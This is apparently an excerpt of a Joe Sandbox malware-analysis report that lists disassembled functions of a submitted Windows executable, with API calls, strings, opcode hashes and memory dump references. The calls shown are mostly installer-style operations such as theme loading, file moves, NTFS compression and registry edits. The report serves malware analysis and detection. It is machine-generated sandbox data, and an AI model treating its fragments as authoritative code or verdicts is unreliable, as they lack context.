                                                                                                    • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                                    • API String ID: 1646373207-834958232
                                                                                                    • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                    • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                                    • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                                    • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                                    APIs
                                                                                                      • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                                      • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                                    • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                    • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                                    • API String ID: 2238633743-2683653824
                                                                                                    • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                    • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                                    • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                                    • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                                    APIs
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                                    • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 2066263336-0
                                                                                                    • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                    • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                                    • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                                    • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                                      • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                                    • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountErrorFileLastMoveTick
                                                                                                    • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                                    • API String ID: 2406187244-2685451598
                                                                                                    • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                    • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                                    • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                                    • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                                    APIs
                                                                                                    • GetDesktopWindow.USER32 ref: 00413D46
                                                                                                    • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                                      • Part of subcall function 00418EC0: 6FBCC6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                                      • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                                    • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CursorDesktopWindow$Show
                                                                                                    • String ID:
                                                                                                    • API String ID: 2074268717-0
                                                                                                    • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                    • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                                    • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                                    • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                                    • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                                    • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                                    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: LoadString$FileMessageModuleName
                                                                                                    • String ID:
                                                                                                    • API String ID: 704749118-0
                                                                                                    • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                    • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                                    • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                                    • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                                      • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                                    • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                                      • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                                    • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                                    • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 855768636-0
                                                                                                    • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                    • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                                    • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                                    • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                                    APIs
                                                                                                    • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                                    • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                                    • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                                    • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: OffsetRect
                                                                                                    • String ID:
                                                                                                    • API String ID: 177026234-0
                                                                                                    • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                                    • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                                    • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                                    • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32 ref: 00417260
                                                                                                    • SetCursor.USER32(00000000), ref: 004172A3
                                                                                                    • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                                    • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1959210111-0
                                                                                                    • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                                    • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                                    • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                                    • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                                    APIs
                                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                                    • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                    • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                                    • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                                    • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                                    APIs
                                                                                                    • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                                    • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                                    • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                                    • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 4025006896-0
                                                                                                    • Opcode ID: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
                                                                                                    • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                                    • Opcode Fuzzy Hash: 7a514111b6068dfbbdb04c48d1a2146d17cf63cab41d43eccfd0167b2dbd8d5c
                                                                                                    • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                                    • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                                    • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                                    • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3473537107-0
                                                                                                    • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                    • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                                    • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                                    • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                                    Strings
                                                                                                    • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                                    • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                                    • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                                    • API String ID: 1452528299-3038984924
                                                                                                    • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                    • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                                    • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                                    • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                                    Strings
                                                                                                    • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                                    • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                                    • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                                    • API String ID: 1452528299-1392080489
                                                                                                    • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                    • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                                    • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                                    • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                                    • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
